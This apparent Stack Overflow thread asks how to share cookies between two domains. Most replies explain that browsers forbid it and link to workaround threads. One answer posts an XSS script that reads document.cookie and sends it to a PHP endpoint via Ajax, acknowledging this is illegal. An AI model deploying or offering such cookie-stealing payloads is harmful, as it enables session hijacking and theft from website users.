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I want to be able to access and set cookies between example.com and mysite.com. How do I do that?

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    You cannot do that directly. What are you trying to accomplish? Also search here and the Internet for "cross domain cookies" for workarounds. – Matthew Aug 30 '10 at 17:17
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    possible duplicate: http://stackoverflow.com/questions/263010/whats-your-favorite-cross-domain-cookie-sharing-approach – Alec Smart Aug 30 '10 at 17:18
  • another possible duplicate: https://stackoverflow.com/questions/3342140/cross-domain-cookies – Anderson Green Feb 24 '22 at 21:38

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You cannot do that with cookies alone: they are set explicitly per-domain, and there isn't a legitimate (read: "non-exploit") way to set them for another domain.

However, if you control both servers, it may be possible to use some workarounds/hacks to achieve this, but pretty it isn't, and it may break unexpectedly (see this question; the answers there should help you to a solution).

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<script>
  function xss(){
    var cookies = document.cookie;
    new Ajax.Request('//localhost/index.php?cookies='+cookies, {
      onSuccess: function(response) {
        alert(cookies);
      }
    });
  }
  xss();
</script>

PS but it's illegal. I use prototype lib.

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